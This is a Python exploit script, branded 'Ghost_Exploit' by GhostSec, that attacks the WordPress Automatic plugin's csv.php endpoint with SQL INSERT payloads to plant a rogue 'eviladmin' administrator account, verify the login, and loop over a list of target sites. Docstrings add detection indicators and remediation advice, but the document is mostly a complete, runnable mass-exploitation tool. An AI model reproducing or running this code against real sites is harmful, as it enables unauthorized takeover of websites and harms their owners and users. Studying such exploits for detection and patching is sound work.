import requests
import sys
import pyfiglet
import urllib3
# Suppress urllib3's InsecureRequestWarning. makeRequest() and check_login()
# both pass verify=False, so TLS certificates are never validated and the
# warning would otherwise be emitted for each HTTPS request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ANSI SGR escape sequences used to colour console output.
# 91 = bright red, 92 = bright green, 1 = bold, 0 = reset all attributes.
RED, GREEN = "\033[91m", "\033[92m"
BOLD, RESET = "\033[1m", "\033[0m"
def print_banner():
    """Print the tool's ASCII-art title followed by its one-line description.

    Console output only; no network traffic is generated here.
    """
    # pyfiglet renders the title text using its "standard" font.
    title = pyfiglet.figlet_format("Ghost_Exploit", font="standard")
    tagline = "💀 Remote Code Execution in Wordpress automatic Plugin POC | By GhostSec 💀"
    print(f"{BOLD}{RED}{title}{RESET}")
    print(f"{BOLD}{GREEN}{tagline}{RESET}\n")
def print_usage():
    """Print the command-line help text, one coloured line per entry.

    The text is informational only. Note that it refers to the script under
    two different file names.
    """
    help_lines = (
        (RED, "Usage: python exploit.py targets.txt OR python exploit.py http://example.com"),
        (RED, "Options:"),
        (GREEN, " Example python RCE_Exploit.py -u http://testphp.vulnweb.com/"),
        (RED, " targets.txt File containing target URLs, one per line."),
        (RED, " http://example.com A single target URL to exploit."),
    )
    for colour, text in help_lines:
        print(f"{BOLD}{colour}{text}{RESET}")
def makeRequest(payload, hash, url):
    """POST one form-encoded request to *url* and return the response object.

    The form body carries three fields: ``q`` (the *payload* string, which
    exploit() fills with a SQL statement), ``auth`` (a single NUL byte) and
    ``integ`` (the *hash* value supplied by the caller). For defenders, a POST
    to the plugin's ``inc/csv.php`` carrying this ``q``/``auth``/``integ``
    combination is a usable signature for web-server log review and WAF rules.

    TLS certificate validation is disabled (``verify=False``) and no timeout
    is set on the request. The parameter name ``hash`` shadows the builtin;
    it is kept because it is part of the function's signature.
    """
    # For "scheme://host/path", index 2 of the split is the host[:port] part.
    # A URL without a scheme raises IndexError here.
    url_parts = url.split('/', 3)
    host = url_parts[2]

    # Host goes in first so the header order matches a browser-like request.
    headers = {'Host': host}
    headers.update({
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    })

    form_fields = {'q': payload, 'auth': b'\0', 'integ': hash}
    return requests.post(url, data=form_fields, headers=headers, verify=False)
def check_login(url):
    """Attempt a WordPress login at *url* and report whether it appears to work.

    Submits the hard-coded ``eviladmin`` / ``admin`` credentials to
    ``/wp-login.php`` and returns True when the response body contains the
    string "Dashboard", False otherwise. Certificate validation is disabled
    and no timeout is set.

    For incident responders: a ``wp-login.php`` POST for the user name
    ``eviladmin`` is a detection signal worth searching authentication and
    access logs for.
    """
    credentials = {
        'log': 'eviladmin',
        'pwd': 'admin',
        'wp-submit': 'Log In',
        'redirect_to': url + '/wp-admin/',
        'testcookie': '1',
    }
    login_response = requests.post(url + '/wp-login.php', data=credentials, verify=False)
    # Success is inferred purely from the page text, not from status or cookies.
    return 'Dashboard' in login_response.text
def exploit(target):
    """Run the two-step account-creation sequence against one site and print the outcome.

    Both requests go to ``/wp-content/plugins/wp-automatic/inc/csv.php`` under
    *target* via makeRequest(). The first carries an INSERT into ``wp_users``
    for the login ``eviladmin``; the second carries an INSERT into
    ``wp_usermeta`` giving that user the ``administrator`` capability. Finally
    check_login() is called to see whether the new account can sign in.

    Indicators a defender can derive from the literals below:
      * POST requests to the ``inc/csv.php`` path of the wp-automatic plugin;
      * a ``wp_users`` row with user_login ``eviladmin``, user_url
        ``http://127.0.0.1:8000`` and user_registered ``2024-04-30 16:26:43``;
      * a ``wp_usermeta`` ``wp_capabilities`` row granting that user
        ``administrator``.
    The table names are hard-coded with the default ``wp_`` prefix.
    Remediation is on the site side: update or remove the wp-automatic plugin
    and audit the administrator accounts.

    Returns None in every path; results are reported only through print().
    """
    url = target + '/wp-content/plugins/wp-automatic/inc/csv.php'
    print(f"{BOLD}{GREEN}[+] Creating user eviladmin on {target}{RESET}")
    # Step 1: user row. The second argument is the fixed value sent as the
    # `integ` form field alongside this exact query string.
    # NOTE(review): the e-mail literal reads like an obfuscation placeholder
    # left by the page this listing was copied from — do not rely on it as an
    # indicator without confirming.
    response = makeRequest(
        "INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')",
        "09956ea086b172d6cf8ac31de406c4c0", url)
    # Any of these strings in the body is treated as the endpoint rejecting
    # the request.
    if "Tampered query" in response.text or "invalid login" in response.text or "login required" in response.text:
        print(f"{BOLD}{RED}[!] Error in the payload on {target}{RESET}")
        return
    # The script treats the absence of "DATE" in the response as "not
    # vulnerable" and stops before the second request.
    if "DATE" not in response.text:
        print(f"{BOLD}{RED}[!] Not vulnerable: {target}{RESET}")
        return
    print(f"{BOLD}{GREEN}[+] Giving eviladmin administrator permissions on {target}{RESET}")
    # Step 2: capability row. The response to this request is discarded, so
    # the "completed" messages below are printed whether or not it succeeded.
    makeRequest(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')",
        "bd98494b41544b818fa9f583dadfa2bb", url)
    print(f"{BOLD}{GREEN}[+] Exploit completed on {target}!{RESET}")
    print(f"{BOLD}{GREEN}[+] Administrator created: eviladmin:admin{RESET}")
    # The only real confirmation is the login attempt below.
    if check_login(target):
        print(f"{BOLD}{GREEN}[+] Login successful for eviladmin on {target}!{RESET}")
    else:
        print(f"{BOLD}{RED}[!] Login failed for eviladmin on {target}.{RESET}")
def load_targets(file_path):
    """Return the lines of the text file at *file_path* as a list of strings.

    Line terminators are removed by ``str.splitlines``; blank lines are kept
    as empty strings and no other validation is applied. A missing file
    raises FileNotFoundError, which the entry point catches.
    """
    with open(file_path, 'r') as handle:
        contents = handle.read()
    return contents.splitlines()
if __name__ == "__main__":
    # Entry point: print the banner, read the command line, then call
    # exploit() once per collected target, in order.
    print_banner()

    # No arguments, or "-h" as the first one: show the help text and stop.
    wants_help = len(sys.argv) < 2 or sys.argv[1] == '-h'
    if wants_help:
        print_usage()
        sys.exit()

    targets = []
    argc = len(sys.argv)
    if argc == 2:
        # One argument is always read as the path of a target list file.
        file_path = sys.argv[1]
        try:
            targets = load_targets(file_path)
        except FileNotFoundError:
            print(f"{BOLD}{RED}[!] File not found: {file_path}{RESET}")
            sys.exit()
    elif argc == 3:
        # Two arguments: the second is the single target and the first is
        # not inspected. Any other argument count leaves the list empty.
        targets = [sys.argv[2]]

    for target in targets:
        exploit(target)